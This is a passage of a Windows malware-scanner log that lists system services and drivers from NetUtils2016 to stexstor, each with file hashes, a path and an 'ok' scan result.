16:43:37.0896 0x0dd0  [ 9EE21F7D46BD2B0F128E0907BABC7D28, 158CE7A2D8FD23CDAB6DF8EF35F624DF85435D2DF273EABF128D46354E12238B ] NetUtils2016    C:\Windows\system32\drivers\NetUtils2016.sys
16:43:37.0911 0x0dd0  NetUtils2016 - ok
16:43:37.0911 0x0dd0  NetUtils2016srv - ok
16:43:37.0927 0x0dd0  [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
16:43:37.0927 0x0dd0  nfrd960 - ok
16:43:37.0927 0x0dd0  [ 8B301D474B478E9A92823BAB50A7BC49, 8181816035F41B1DABEC05E65E4F67BCD785F56760A61F1049E91BA39D42F01D ] NlaSvc          C:\Windows\System32\nlasvc.dll
16:43:37.0943 0x0dd0  NlaSvc - ok
16:43:37.0943 0x0dd0  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs            C:\Windows\system32\drivers\Npfs.sys
16:43:37.0943 0x0dd0  Npfs - ok
16:43:37.0943 0x0dd0  [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi             C:\Windows\system32\nsisvc.dll
16:43:37.0943 0x0dd0  nsi - ok
16:43:37.0943 0x0dd0  [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
16:43:37.0943 0x0dd0  nsiproxy - ok
16:43:37.0989 0x0dd0  [ 47B2D0B31BDC3EBE6090228E2BA3764D, 984A4B38300954164BCBF57EC1A09C18B53779E60A26E9618B50E26016735787 ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
16:43:38.0021 0x0dd0  Ntfs - ok
16:43:38.0021 0x0dd0  [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null            C:\Windows\system32\drivers\Null.sys
16:43:38.0021 0x0dd0  Null - ok
16:43:38.0021 0x0dd0  [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid          C:\Windows\system32\drivers\nvraid.sys
16:43:38.0036 0x0dd0  nvraid - ok
16:43:38.0036 0x0dd0  [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
16:43:38.0036 0x0dd0  nvstor - ok
16:43:38.0052 0x0dd0  [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
16:43:38.0052 0x0dd0  nv_agp - ok
16:43:38.0052 0x0dd0  [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
16:43:38.0052 0x0dd0  ohci1394 - ok
16:43:38.0052 0x0dd0  [ 5C12E1436BD6CC9ED022CA5335D4F1A0, CE323DE98A4328B348193B10867E16C840224559F391213590629360EFB5F33D ] ose             C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
16:43:38.0067 0x0dd0  ose - ok
16:43:38.0161 0x0dd0  [ FE9C0029E1AF26350D9985D00520E5C8, 967079CCF7B2CBD4B48C9F076675C26AF93A1CEC26C96811F279414E34004EE6 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
16:43:38.0239 0x0dd0  osppsvc - ok
16:43:38.0255 0x0dd0  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
16:43:38.0270 0x0dd0  p2pimsvc - ok
16:43:38.0270 0x0dd0  [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc          C:\Windows\system32\p2psvc.dll
16:43:38.0286 0x0dd0  p2psvc - ok
16:43:38.0286 0x0dd0  [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport         C:\Windows\system32\drivers\parport.sys
16:43:38.0286 0x0dd0  Parport - ok
16:43:38.0301 0x0dd0  [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr         C:\Windows\system32\drivers\partmgr.sys
16:43:38.0301 0x0dd0  partmgr - ok
16:43:38.0301 0x0dd0  [ 3CD83692C43D87088E85E3C916146FFB, 9E812535E8FBA045FDA30F68E9EB2031132C37721D542A2DC9D4C33E2B137FCF ] PcaSvc          C:\Windows\System32\pcasvc.dll
16:43:38.0301 0x0dd0  PcaSvc - ok
16:43:38.0317 0x0dd0  [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci             C:\Windows\system32\drivers\pci.sys
16:43:38.0317 0x0dd0  pci - ok
16:43:38.0317 0x0dd0  [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide          C:\Windows\system32\drivers\pciide.sys
16:43:38.0317 0x0dd0  pciide - ok
16:43:38.0333 0x0dd0  [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia          C:\Windows\system32\drivers\pcmcia.sys
16:43:38.0333 0x0dd0  pcmcia - ok
16:43:38.0333 0x0dd0  [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw             C:\Windows\system32\drivers\pcw.sys
16:43:38.0333 0x0dd0  pcw - ok
16:43:38.0348 0x0dd0  [ EA4D67448BE493D543F1730D6CD04694, 24717C5E41B7CA522F3330EF2228B6685E710A5259396E9887A1C1E7A413F8CA ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
16:43:38.0364 0x0dd0  PEAUTH - ok
16:43:38.0395 0x0dd0  [ B9B0A4299DD2D76A4243F75FD54DC680, BBF62E9628131FA396EB08D63B76D2D5FBDD61339E92B759125A066470D1C039 ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
16:43:38.0411 0x0dd0  PeerDistSvc - ok
16:43:38.0426 0x0dd0  [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost        C:\Windows\SysWow64\perfhost.exe
16:43:38.0426 0x0dd0  PerfHost - ok
16:43:38.0457 0x0dd0  [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla             C:\Windows\system32\pla.dll
16:43:38.0489 0x0dd0  pla - ok
16:43:38.0489 0x0dd0  [ 4808ACE4B2C161AF2667F6C1AC45B434, 7C8F570721BA9827D2F4E5E48545D8A062484783091D7B1340BEE1F78AC90117 ] PlaysService    C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe
16:43:38.0489 0x0dd0  PlaysService - ok
16:43:38.0504 0x0dd0  [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
16:43:38.0504 0x0dd0  PlugPlay - ok
16:43:38.0520 0x0dd0  [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
16:43:38.0520 0x0dd0  PNRPAutoReg - ok
16:43:38.0520 0x0dd0  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
16:43:38.0535 0x0dd0  PNRPsvc - ok
16:43:38.0551 0x0dd0  [ 80D6B0563ED2BF10656B1D4748331082, B7E6B5E1148B7EE537E8D5C3A65450876B61CD45A395267D08699746E98AD574 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
16:43:38.0551 0x0dd0  PolicyAgent - ok
16:43:38.0567 0x0dd0  [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] Power           C:\Windows\system32\umpo.dll
16:43:38.0567 0x0dd0  Power - ok
16:43:38.0567 0x0dd0  [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
16:43:38.0567 0x0dd0  PptpMiniport - ok
16:43:38.0567 0x0dd0  [ 5A4FC1D0CA07395973C5C35D9BFED7D7, 2E21FA188DCFE71204BA8F12EAF29520EF3B7B479AD99F81A0C4DB954C70D74A ] PrefersSecure   C:\ProgramData\PrefersSecure\Nettrans.exe
16:43:38.0567 0x0dd0  PrefersSecure - ok
16:43:38.0582 0x0dd0  [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor       C:\Windows\system32\drivers\processr.sys
16:43:38.0582 0x0dd0  Processor - ok
16:43:38.0582 0x0dd0  [ B6A58491307B4CADA572583D863DC602, 5C44936605E52C9533E4CE22F18FAB8211475877F71EFD88DA4D02FD608C90A3 ] ProfSvc         C:\Windows\system32\profsvc.dll
16:43:38.0582 0x0dd0  ProfSvc - ok
16:43:38.0598 0x0dd0  [ 1F9335A2C68B65E7D95985FA50968EA0, A0918C943F9CF5C6DB9440222B8E3B0DD645068B44E18253F275509550C0DF4D ] ProtectedStorage C:\Windows\system32\lsass.exe
16:43:38.0598 0x0dd0  ProtectedStorage - ok
16:43:38.0598 0x0dd0  [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
16:43:38.0598 0x0dd0  Psched - ok
16:43:38.0629 0x0dd0  [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300          C:\Windows\system32\drivers\ql2300.sys
16:43:38.0660 0x0dd0  ql2300 - ok
16:43:38.0660 0x0dd0  [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx          C:\Windows\system32\drivers\ql40xx.sys
16:43:38.0660 0x0dd0  ql40xx - ok
16:43:38.0676 0x0dd0  [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE           C:\Windows\system32\qwave.dll
16:43:38.0676 0x0dd0  QWAVE - ok
16:43:38.0676 0x0dd0  [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
16:43:38.0676 0x0dd0  QWAVEdrv - ok
16:43:38.0691 0x0dd0  [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
16:43:38.0691 0x0dd0  RasAcd - ok
16:43:38.0691 0x0dd0  [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
16:43:38.0691 0x0dd0  RasAgileVpn - ok
16:43:38.0691 0x0dd0  [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto         C:\Windows\System32\rasauto.dll
16:43:38.0691 0x0dd0  RasAuto - ok
16:43:38.0707 0x0dd0  [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
16:43:38.0707 0x0dd0  Rasl2tp - ok
16:43:38.0707 0x0dd0  [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan          C:\Windows\System32\rasmans.dll
16:43:38.0723 0x0dd0  RasMan - ok
16:43:38.0723 0x0dd0  [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
16:43:38.0723 0x0dd0  RasPppoe - ok
16:43:38.0723 0x0dd0  [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
16:43:38.0723 0x0dd0  RasSstp - ok
16:43:38.0738 0x0dd0  [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
16:43:38.0738 0x0dd0  rdbss - ok
16:43:38.0754 0x0dd0  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
16:43:38.0754 0x0dd0  rdpbus - ok
16:43:38.0754 0x0dd0  [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
16:43:38.0754 0x0dd0  RDPCDD - ok
16:43:38.0754 0x0dd0  [ 1B6163C503398B23FF8B939C67747683, 339A5AA7970FF34FAAB213B655860C5B0DEC5F983A4A11A088017D849F320ACE ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
16:43:38.0754 0x0dd0  RDPDR - ok
16:43:38.0769 0x0dd0  [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
16:43:38.0769 0x0dd0  RDPENCDD - ok
16:43:38.0769 0x0dd0  [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
16:43:38.0769 0x0dd0  RDPREFMP - ok
16:43:38.0769 0x0dd0  [ 065F79543D7999EC28B687F87E96B803, 6B235C422DCA79ABF0D051C066B2866643333F7ADB7AF914F6EEAC448AA59AAF ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
16:43:38.0769 0x0dd0  RdpVideoMiniport - ok
16:43:38.0785 0x0dd0  [ FE571E088C2D83619D2D48D4E961BF41, 88C5A2FCB1D0E528657842E39963471A6E42FCA3FCDF37955AEC8258AB4C48EA ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
16:43:38.0785 0x0dd0  RDPWD - ok
16:43:38.0785 0x0dd0  [ 34ED295FA0121C241BFEF24764FC4520, AAEE5F00CAA763A5BA51CF56BD7262C03409CD72BD5601490E3EC3FFF929BB5F ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
16:43:38.0785 0x0dd0  rdyboost - ok
16:43:38.0801 0x0dd0  [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess    C:\Windows\System32\mprdim.dll
16:43:38.0801 0x0dd0  RemoteAccess - ok
16:43:38.0801 0x0dd0  [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry  C:\Windows\system32\regsvc.dll
16:43:38.0801 0x0dd0  RemoteRegistry - ok
16:43:38.0816 0x0dd0  [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
16:43:38.0816 0x0dd0  RpcEptMapper - ok
16:43:38.0816 0x0dd0  [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator      C:\Windows\system32\locator.exe
16:43:38.0816 0x0dd0  RpcLocator - ok
16:43:38.0832 0x0dd0  [ 622C96AFB07BB82C8650B47172137AC4, B74CEA5A3F4945E5A3EAE7AF1B1FA75F611C65C6FACE393052A512FA81B0C17C ] RpcSs           C:\Windows\system32\rpcss.dll
16:43:38.0832 0x0dd0  RpcSs - ok
16:43:38.0847 0x0dd0  [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
16:43:38.0847 0x0dd0  rspndr - ok
16:43:38.0863 0x0dd0  [ 9140DB0911DE035FED0A9A77A2D156EA, 07C9D7E2978062ABD84B58B390360D4C0F72C6A5A2310444579DC095943BD008 ] RTL8167         C:\Windows\system32\DRIVERS\Rt64win7.sys
16:43:38.0863 0x0dd0  RTL8167 - ok
16:43:38.0863 0x0dd0  [ E60C0A09F997826C7627B244195AB581, E8630ED74B38B98BF584E353D992C1311BC36AB7F20A1BB66C9CD65CE1E46F8D ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
16:43:38.0863 0x0dd0  s3cap - ok
16:43:38.0879 0x0dd0  [ 1F9335A2C68B65E7D95985FA50968EA0, A0918C943F9CF5C6DB9440222B8E3B0DD645068B44E18253F275509550C0DF4D ] SamSs           C:\Windows\system32\lsass.exe
16:43:38.0879 0x0dd0  SamSs - ok
16:43:38.0879 0x0dd0  [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
16:43:38.0879 0x0dd0  sbp2port - ok
16:43:38.0894 0x0dd0  [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
16:43:38.0894 0x0dd0  SCardSvr - ok
16:43:38.0894 0x0dd0  [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
16:43:38.0894 0x0dd0  scfilter - ok
16:43:38.0910 0x0dd0  [ 40686B59C127F0C93B4234E4A1E3472A, B2DD61CB796C6AA8AFD285D43472B94646CA6D331D282818E0FDC9DE28DDE9CF ] Schedule        C:\Windows\system32\schedsvc.dll
16:43:38.0941 0x0dd0  Schedule - ok
16:43:38.0941 0x0dd0  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc     C:\Windows\System32\certprop.dll
16:43:38.0941 0x0dd0  SCPolicySvc - ok
16:43:38.0941 0x0dd0  [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
16:43:38.0957 0x0dd0  SDRSVC - ok
16:43:38.0957 0x0dd0  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv          C:\Windows\system32\drivers\secdrv.sys
16:43:38.0957 0x0dd0  secdrv - ok
16:43:38.0957 0x0dd0  [ A19623BDD61E66A12AB53992002B4F3A, E351CEEC086084A417BA3BD0EEF46114D3147EC38E3EF8BE49B724F9D028CC56 ] seclogon        C:\Windows\system32\seclogon.dll
16:43:38.0957 0x0dd0  seclogon - ok
16:43:38.0972 0x0dd0  [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS            C:\Windows\System32\sens.dll
16:43:38.0972 0x0dd0  SENS - ok
16:43:38.0972 0x0dd0  [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc        C:\Windows\system32\sensrsvc.dll
16:43:38.0972 0x0dd0  SensrSvc - ok
16:43:38.0972 0x0dd0  [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum         C:\Windows\system32\DRIVERS\serenum.sys
16:43:38.0972 0x0dd0  Serenum - ok
16:43:38.0972 0x0dd0  [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial          C:\Windows\system32\DRIVERS\serial.sys
16:43:38.0988 0x0dd0  Serial - ok
16:43:38.0988 0x0dd0  [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse        C:\Windows\system32\drivers\sermouse.sys
16:43:38.0988 0x0dd0  sermouse - ok
16:43:38.0988 0x0dd0  [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv      C:\Windows\system32\sessenv.dll
16:43:39.0003 0x0dd0  SessionEnv - ok
16:43:39.0003 0x0dd0  [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
16:43:39.0003 0x0dd0  sffdisk - ok
16:43:39.0003 0x0dd0  [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
16:43:39.0003 0x0dd0  sffp_mmc - ok
16:43:39.0003 0x0dd0  [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
16:43:39.0003 0x0dd0  sffp_sd - ok
16:43:39.0003 0x0dd0  [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy         C:\Windows\system32\drivers\sfloppy.sys
16:43:39.0003 0x0dd0  sfloppy - ok
16:43:39.0019 0x0dd0  [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess    C:\Windows\System32\ipnathlp.dll
16:43:39.0019 0x0dd0  SharedAccess - ok
16:43:39.0035 0x0dd0  [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
16:43:39.0035 0x0dd0  ShellHWDetection - ok
16:43:39.0050 0x0dd0  [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2        C:\Windows\system32\drivers\SiSRaid2.sys
16:43:39.0050 0x0dd0  SiSRaid2 - ok
16:43:39.0050 0x0dd0  [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4        C:\Windows\system32\drivers\sisraid4.sys
16:43:39.0050 0x0dd0  SiSRaid4 - ok
16:43:39.0066 0x0dd0  [ B72B80E6FF423C5011E745CB76DA9A08, 18A6B9D46E91AD4D463EB5CB832702392D2E162577F90C328B515FCE69FABD15 ] SkypeUpdate     C:\Program Files (x86)\Skype\Updater\Updater.exe
16:43:39.0066 0x0dd0  SkypeUpdate - ok
16:43:39.0066 0x0dd0  [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
16:43:39.0066 0x0dd0  Smb - ok
16:43:39.0081 0x0dd0  [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
16:43:39.0081 0x0dd0  SNMPTRAP - ok
16:43:39.0081 0x0dd0  [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr           C:\Windows\system32\drivers\spldr.sys
16:43:39.0081 0x0dd0  spldr - ok
16:43:39.0097 0x0dd0  [ B96C17B5DC1424D56EEA3A99E97428CD, AF0A85066A7983878DC1C663811CE61C6CA1912DC956184F878B7B82DB93C651 ] Spooler         C:\Windows\System32\spoolsv.exe
16:43:39.0097 0x0dd0  Spooler - ok
16:43:39.0175 0x0dd0  [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc          C:\Windows\system32\sppsvc.exe
16:43:39.0222 0x0dd0  sppsvc - ok
16:43:39.0237 0x0dd0  [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify     C:\Windows\system32\sppuinotify.dll
16:43:39.0237 0x0dd0  sppuinotify - ok
16:43:39.0237 0x0dd0  [ E8276BE984738AA44070CFDE6EFC9300, F0B09D3E08BDB1B8AEBA97A700271E97AB2506793B42D96415B23DB68DA99FA8 ] SQLWriter       C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
16:43:39.0253 0x0dd0  SQLWriter - ok
16:43:39.0253 0x0dd0  [ EC666682FE8344CF7E6ED69E74FA9F4F, DCD2A1C046425630689E2C9A6A6E356FE5A2A6664D12C20CFE236FCB32240DF9 ] srv             C:\Windows\system32\DRIVERS\srv.sys
16:43:39.0269 0x0dd0  srv - ok
16:43:39.0269 0x0dd0  [ E450C0318DCE8ED28ED272C8806B8495, D2FD459F8C5E42103EF2F71421FA175A4F0821F8C2A3763093122D433D1C50FB ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
16:43:39.0284 0x0dd0  srv2 - ok
16:43:39.0284 0x0dd0  [ 9C12C78AD36C23D925711A4640228225, FF72C23F2A08EDF0C41BAF1EB0245AB44FF91365C5466F09C47A8F0928D20994 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
16:43:39.0284 0x0dd0  srvnet - ok
16:43:39.0300 0x0dd0  [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
16:43:39.0300 0x0dd0  SSDPSRV - ok
16:43:39.0300 0x0dd0  [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc         C:\Windows\system32\sstpsvc.dll
16:43:39.0300 0x0dd0  SstpSvc - ok
16:43:39.0331 0x0dd0  [ 596DC69BB40A96FCA4B19D9D1E221E34, 3469D3B2E9A88E39C14AE2E3DD5EC3D91FBB88CA568D794555B397B50E64AB15 ] Steam Client Service C:\Program Files (x86)\Common Files\Steam\SteamService.exe
16:43:39.0362 0x0dd0  Steam Client Service - ok
16:43:39.0362 0x0dd0  [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor        C:\Windows\system32\drivers\stexstor.sys
16:43:39.0362 0x0dd0  stexstor - ok
